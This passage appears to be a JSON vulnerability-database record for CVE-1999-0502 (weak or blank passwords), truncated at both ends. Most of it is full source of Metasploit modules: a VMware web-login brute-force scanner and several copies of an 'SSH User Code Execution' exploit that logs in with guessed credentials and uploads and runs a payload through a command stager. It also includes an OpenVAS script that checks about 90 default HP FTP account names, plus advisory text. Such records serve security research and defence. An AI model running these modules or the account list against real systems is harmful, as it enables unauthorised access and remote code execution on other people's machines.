"MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Web Login Scanner',\n 'Description' => 'This module attempts to authenticate to the VMWare HTTP service\n for VmWare Server, ESX, and ESXI',\n 'Author' => ['theLightCosine'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n OptString.new('URI', [true, \"The default URI to login with\", \"/sdk\"]),\n Opt::RPORT(443)\n ])\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: 'vmware',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run_host(ip)\n return unless is_vmware?\n each_user_pass { |user, pass|\n result = vim_do_login(user, pass)\n case result\n when :success\n print_good \"#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})\"\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)\n return if datastore['STOP_ON_SUCCESS']\n when :fail\n print_error \"#{rhost}:#{rport} - Login Failure (#{user}:#{pass})\"\n end\n }\n end\n\n # Mostly taken from the Apache Tomcat service validator\n def is_vmware?\n soap_data =\n %Q|<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n <env:Body>\n <RetrieveServiceContent xmlns=\"urn:vim25\">\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\n </RetrieveServiceContent>\n </env:Body>\n </env:Envelope>|\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'method' => 'POST',\n 'agent' => 'VMware VI Client',\n 'data' => soap_data\n }, 25)\n\n unless res\n vprint_error(\"#{rhost}:#{rport} Error: no response\")\n return false\n end\n\n fingerprint_vmware(res)\n rescue ::Rex::ConnectionError => e\n vprint_error(\"#{rhost}:#{rport} Error: could not connect\")\n return false\n rescue => e\n vprint_error(\"#{rhost}:#{rport} Error: #{e}\")\n return false\n end\n\n def fingerprint_vmware(res)\n unless res\n vprint_error(\"#{rhost}:#{rport} Error: no response\")\n return false\n end\n return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')\n\n os_match = res.body.match(/<name>([\\w\\s]+)<\\/name>/)\n ver_match = res.body.match(/<version>([\\w\\s\\.]+)<\\/version>/)\n build_match = res.body.match(/<build>([\\w\\s\\.\\-]+)<\\/build>/)\n full_match = res.body.match(/<fullName>([\\w\\s\\.\\-]+)<\\/fullName>/)\n\n if full_match\n print_good \"#{rhost}:#{rport} - Identified #{full_match[1]}\"\n report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])\n end\n\n unless os_match and ver_match and build_match\n vprint_error(\"#{rhost}:#{rport} Error: Could not identify host as VMWare\")\n return false\n end\n\n if os_match[1].include?('ESX') || os_match[1].include?('vCenter')\n # Report a fingerprint match for OS identification\n report_note(\n :host => rhost,\n :ntype => 'fingerprint.match',\n :data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + \" \" + ver_match[1], 'os.version' => build_match[1] }\n )\n return true\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_http_login.rb"}], "zdt": [{"lastseen": "2018-01-02T03:17:37", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2017-03-23T00:00:00", "type": "zdt", "title": "SSH - User Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2017-03-23T00:00:00", "href": "https://0day.today/exploit/description/27399", "id": "1337DAY-ID-27399", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'net/ssh'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n \r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n \r\n attr_accessor :ssh_socket\r\n \r\n def initialize\r\n super(\r\n 'Name' => 'SSH User Code Execution',\r\n 'Description' => %q{\r\n This module connects to the target system and executes the necessary\r\n commands to run the specified payload via SSH. If a native payload is\r\n specified, an appropriate stager will be used.\r\n },\r\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\r\n 'References' =>\r\n [\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => 'true',\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => %w{ linux osx python },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Linux x64',\r\n {\r\n 'Arch' => ARCH_X64,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'OSX x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n }\r\n ],\r\n [ 'Python',\r\n {\r\n 'Arch' => ARCH_PYTHON,\r\n 'Platform' => 'python'\r\n }\r\n ]\r\n ],\r\n 'CmdStagerFlavor' => %w{ bourne echo printf },\r\n 'DefaultTarget' => 0,\r\n # For the CVE\r\n 'DisclosureDate' => 'Jan 01 1999'\r\n )\r\n \r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\r\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\r\n OptString.new('RHOST', [ true, \"The target address\" ]),\r\n Opt::RPORT(22)\r\n ], self.class\r\n )\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\r\n ]\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts = {})\r\n vprint_status(\"Executing #{cmd}\")\r\n begin\r\n Timeout.timeout(3) do\r\n self.ssh_socket.exec!(\"#{cmd}\\n\")\r\n end\r\n rescue ::Exception\r\n end\r\n end\r\n \r\n def do_login(ip, user, pass, port)\r\n factory = ssh_socket_factory\r\n opt_hash = {\r\n :auth_methods => ['password', 'keyboard-interactive'],\r\n :port => port,\r\n :use_agent => false,\r\n :config => false,\r\n :password => pass,\r\n :proxy => factory,\r\n :non_interactive => true\r\n }\r\n \r\n opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\r\n \r\n begin\r\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\r\n rescue Rex::ConnectionError\r\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\r\n rescue Net::SSH::Disconnect, ::EOFError\r\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\r\n rescue Net::SSH::AuthenticationFailed\r\n fail_with(Failure::NoAccess, 'Failed authentication')\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\r\n end\r\n \r\n if not self.ssh_socket\r\n fail_with(Failure::Unknown, 'Failed to start SSH socket')\r\n end\r\n return\r\n end\r\n \r\n def exploit\r\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\r\n \r\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...\")\r\n if target['Platform'] == 'python'\r\n execute_command(\"python -c \\\"#{payload.encoded}\\\"\")\r\n else\r\n execute_cmdstager({:linemax => 500})\r\n end\r\n \r\n self.ssh_socket.close\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/27399", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T19:09:15", "edition": 2, "description": "This Metasploit module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.", "published": "2013-05-16T00:00:00", "type": "zdt", "title": "SSH User Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2013-05-16T00:00:00", "id": "1337DAY-ID-20781", "href": "https://0day.today/exploit/description/20781", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'net/ssh'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::CmdStagerBourne\r\n\r\n attr_accessor :ssh_socket\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'SSH User Code Execution',\r\n 'Description' => %q{\r\n This module utilizes a stager to upload a base64 encoded\r\n binary which is then decoded, chmod'ed and executed from\r\n the command shell.\r\n },\r\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\r\n 'References' =>\r\n [\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => 'true',\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => [ 'osx', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n },\r\n ],\r\n [ 'Linux x64',\r\n {\r\n 'Arch' => ARCH_X86_64,\r\n 'Platform' => 'linux'\r\n },\r\n ],\r\n [ 'OSX x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n },\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n # For the CVE\r\n 'DisclosureDate' => 'Jan 01 1999'\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\r\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\r\n OptString.new('RHOST', [ true, \"The target address\" ]),\r\n Opt::RPORT(22)\r\n ], self.class\r\n )\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\r\n ]\r\n )\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n begin\r\n Timeout.timeout(3) do\r\n self.ssh_socket.exec!(\"#{cmd}\\n\")\r\n end\r\n rescue ::Exception\r\n end\r\n end\r\n\r\n def do_login(ip, user, pass, port)\r\n opt_hash = {\r\n :auth_methods => ['password', 'keyboard-interactive'],\r\n :msframework => framework,\r\n :msfmodule => self,\r\n :port => port,\r\n :disable_agent => true,\r\n :password => pass\r\n }\r\n\r\n opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\r\n rescue Rex::ConnectionError, Rex::AddressInUse\r\n fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')\r\n rescue Net::SSH::Disconnect, ::EOFError\r\n fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')\r\n rescue Net::SSH::AuthenticationFailed\r\n fail_with(Exploit::Failure::NoAccess, 'Failed authentication')\r\n rescue Net::SSH::Exception => e\r\n fail_with(Exploit::Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\r\n end\r\n\r\n if not self.ssh_socket\r\n fail_with(Exploit::Failure::Unknown)\r\n end\r\n return\r\n end\r\n\r\n def exploit\r\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\r\n\r\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...\")\r\n execute_cmdstager({:linemax => 500})\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20781"}], "openvas": [{"lastseen": "2017-12-08T11:44:11", "description": "This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.", "edition": 2, "published": "2005-11-03T00:00:00", "title": "MPEi/X Default Accounts", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=11000", "id": "OPENVAS:11000", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: DDI_MPEiX_FTP_Accounts.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: MPEi/X Default Accounts\n#\n# Authors:\n# H D Moore <hdmoore@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.\";\n\ntag_solution = \"Apply complex passwords to all accounts.\";\n\nif(description)\n{\n script_id(11000); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n name = \"MPEi/X Default Accounts\";\n\n script_name(name);\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 H D Moore\");\n family = \"Default Accounts\";\n\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\n#\n# default account listing\n#\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\n#\n# The script code starts here\n#\n\n\n# open the connection\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\nbanner = get_ftp_banner(port:port);\n\n# check for HP ftp service\nif(\"HP ARPA FTP\" >< banner)\n{\n # do nothing\n} else {\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF); \n \n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n \n if (\"230 User logged on\" >< resp)\n {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(soc);\n\nif (strlen(cracked))\n{\n report = string(\"These accounts have no passwords:\\n\\n\", cracked);\n security_message(port:port, data:report);\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-11-30T12:32:49", "description": "", "published": "1999-01-01T00:00:00", "type": "exploitdb", "title": "SSH - User Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "1999-01-01T00:00:00", "id": "EDB-ID:41694", "href": "https://www.exploit-db.com/exploits/41694", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'net/ssh'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n attr_accessor :ssh_socket\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'SSH User Code Execution',\r\n 'Description' => %q{\r\n This module connects to the target system and executes the necessary\r\n commands to run the specified payload via SSH. If a native payload is\r\n specified, an appropriate stager will be used.\r\n },\r\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\r\n 'References' =>\r\n [\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => 'true',\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => %w{ linux osx python },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Linux x64',\r\n {\r\n 'Arch' => ARCH_X64,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'OSX x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n }\r\n ],\r\n [ 'Python',\r\n {\r\n 'Arch' => ARCH_PYTHON,\r\n 'Platform' => 'python'\r\n }\r\n ]\r\n ],\r\n 'CmdStagerFlavor' => %w{ bourne echo printf },\r\n 'DefaultTarget' => 0,\r\n # For the CVE\r\n 'DisclosureDate' => 'Jan 01 1999'\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\r\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\r\n OptString.new('RHOST', [ true, \"The target address\" ]),\r\n Opt::RPORT(22)\r\n ], self.class\r\n )\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\r\n ]\r\n )\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n vprint_status(\"Executing #{cmd}\")\r\n begin\r\n Timeout.timeout(3) do\r\n self.ssh_socket.exec!(\"#{cmd}\\n\")\r\n end\r\n rescue ::Exception\r\n end\r\n end\r\n\r\n def do_login(ip, user, pass, port)\r\n factory = ssh_socket_factory\r\n opt_hash = {\r\n :auth_methods => ['password', 'keyboard-interactive'],\r\n :port => port,\r\n :use_agent => false,\r\n :config => false,\r\n :password => pass,\r\n :proxy => factory,\r\n :non_interactive => true\r\n }\r\n\r\n opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\r\n rescue Rex::ConnectionError\r\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\r\n rescue Net::SSH::Disconnect, ::EOFError\r\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\r\n rescue Net::SSH::AuthenticationFailed\r\n fail_with(Failure::NoAccess, 'Failed authentication')\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\r\n end\r\n\r\n if not self.ssh_socket\r\n fail_with(Failure::Unknown, 'Failed to start SSH socket')\r\n end\r\n return\r\n end\r\n\r\n def exploit\r\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\r\n\r\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...\")\r\n if target['Platform'] == 'python'\r\n execute_command(\"python -c \\\"#{payload.encoded}\\\"\")\r\n else\r\n execute_cmdstager({:linemax => 500})\r\n end\r\n\r\n self.ssh_socket.close\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41694"}], "saint": [{"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "edition": 2, "description": "Added: 01/05/2011 \nCVE: [CVE-1999-0502](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502>) \n\n\n### Background\n\nPasswords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access. \n\n### Problem\n\nAdministrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system. \n\n### Resolution\n\nProtect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight charactes long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. \n\n### References\n\n<http://www.securityfocus.com/infocus/1537> \n\n\n### Limitations\n\nThe target must be running the ssh service in order for the exploit to succeed. \n\nThe OpenSSH client must be installed on the SAINTexploit host. \n\n### Platforms\n\nLinux \nUnix \nCisco \n \n\n", "modified": "2011-01-05T00:00:00", "published": "2011-01-05T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ssh_login", "id": "SAINT:D03628286E2696A69838C01360532538", "type": "saint", "title": "SSH password weakness", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "description": "Added: 01/05/2011 \nCVE: [CVE-1999-0502](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502>) \n\n\n### Background\n\nPasswords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access. \n\n### Problem\n\nAdministrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system. \n\n### Resolution\n\nProtect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight charactes long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. \n\n### References\n\n<http://www.securityfocus.com/infocus/1537> \n\n\n### Limitations\n\nThe target must be running the ssh service in order for the exploit to succeed. \n\nThe OpenSSH client must be installed on the SAINTexploit host. \n\n### Platforms\n\nLinux \nUnix \nCisco \n \n\n", "edition": 4, "modified": "2011-01-05T00:00:00", "published": "2011-01-05T00:00:00", "id": "SAINT:713447983665FEF2B21EA1044C36B51E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ssh_login", "title": "SSH password weakness", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:26", "description": "", "published": "2013-05-15T00:00:00", "type": "packetstorm", "title": "SSH User Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2013-05-15T00:00:00", "id": "PACKETSTORM:121655", "href": "https://packetstormsecurity.com/files/121655/SSH-User-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'net/ssh' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::CmdStagerBourne \n \nattr_accessor :ssh_socket \n \ndef initialize \nsuper( \n'Name' => 'SSH User Code Execution', \n'Description' => %q{ \nThis module utilizes a stager to upload a base64 encoded \nbinary which is then decoded, chmod'ed and executed from \nthe command shell. \n}, \n'Author' => ['Spencer McIntyre', 'Brandon Knight'], \n'References' => \n[ \n[ 'CVE', '1999-0502'] # Weak password \n], \n'License' => MSF_LICENSE, \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'PrependFork' => 'true', \n'EXITFUNC' => 'process' \n}, \n'Payload' => \n{ \n'Space' => 4096, 